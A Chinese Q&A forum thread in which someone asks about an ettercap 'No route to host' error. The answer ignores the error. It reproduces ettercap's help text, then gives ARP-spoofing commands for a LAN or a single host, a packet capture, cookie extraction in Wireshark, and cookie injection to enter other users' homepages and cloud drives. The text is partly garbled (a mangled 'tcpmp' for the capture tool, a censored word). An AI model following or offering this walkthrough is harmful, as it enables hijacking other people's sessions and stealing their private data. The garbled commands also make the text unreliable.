ettercap嗅探时提示SEND L3 ERROER ...(No route to host)
发布网友
发布时间:2022-04-23 18:48
共1个回答
热心网友
时间:2023-10-13 16:07
首先介绍一下Ettercap的使用方法,英文比较简单,这里就不翻译了,直接列出它的帮助说明:
Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]
TARGET is in the format MAC/IP/PORTs (see the man for further detail)
Sniffing and Attack options:
-M, --mitm <METHOD:ARGS> perform a mitm attack
-o, --only-mitm don't sniff, only perform the mitm attack
-b, --broadcast sniff packets destined to broadcast
-B, --bridge <IFACE> use bridged sniff (needs 2 ifaces)
-p, --nopromisc do not put the iface in promisc mode
-S, --nosslmitm do not forge SSL certificates
-u, --unoffensive do not forward packets
-r, --read <file> read data from pcapfile <file>
-f, --pcapfilter <string> set the pcap filter <string>
-R, --reversed use reversed TARGET matching
-t, --proto <proto> sniff only this proto (default is all)
--certificate <file> certificate file to use for SSL MiTM
--private-key <file> private key file to use for SSL MiTM
User Interface Type:
-T, --text use text only GUI
-q, --quiet do not display packet contents
-s, --script <CMD> issue these commands to the GUI
-C, --curses use curses GUI
-D, --daemon daemonize ettercap (no GUI)
-G, --gtk use GTK+ GUI
Logging options:
-w, --write <file> write sniffed data to pcapfile <file>
-L, --log <logfile> log all the traffic to this <logfile>
-l, --log-info <logfile> log only passive infos to this <logfile>
-m, --log-msg <logfile> log all the messages to this <logfile>
-c, --compress use gzip compression on log files
Visualization options:
-d, --dns resolves ip addresses into hostnames
-V, --visual <format> set the visualization format
-e, --regex <regex> visualize only packets matching this regex
-E, --ext-headers print extended header for every pck
-Q, --superquiet do not display user and password
General options:
-i, --iface <iface> use this network interface
-I, --liface show all the network interfaces
-Y, --secondary <ifaces> list of secondary network interfaces
-n, --netmask <netmask> force this <netmask> on iface
-A, --address <address> force this local <address> on iface
-P, --plugin <plugin> launch this <plugin>
-F, --filter <file> load the filter <file> (content filter)
-z, --silent do not perform the initial ARP scan
-j, --load-hosts <file> load the hosts list from <file>
-k, --save-hosts <file> save the hosts list to <file>
-W, --wifi-key <wkey> use this key to decrypt wifi packets (wep or wpa)
-a, --config <config> use the alterative config file <config>
Standard options:
-v, --version prints the version and exit
-h, --help
ARP欺骗之会话劫持:
ettercap -i eth0 -T -M arp:remote /10.0.0.1/ // 欺*域网内所有主机
ettercap -i eth0 -T -M arp:remote /10.0.0.1/ /10.0.0.12/ 欺骗IP为10.0.0.12的主机
同时使用tcpmp抓包(当然也可以使用wireshark实时抓包并显示,但对本机压力比较大,建议使用tcpmp抓包,完成后再用wireshark显示):
tcpmp -i eth0
经过一段时间的抓包之后就可以停止了。打开wireshark分析捕获到的数据包分析,使用过滤语法,找出含有cookies的数据包:
复制出cookies的值,并在浏览器中利用,这里推荐一款好用的cooikes利用工具cookie-injecting-tools(地址:https://github.com/lfzark/cookie-injecting-tools)。利用成功后,刷新页面,就可以进入到被人的主页和网盘了
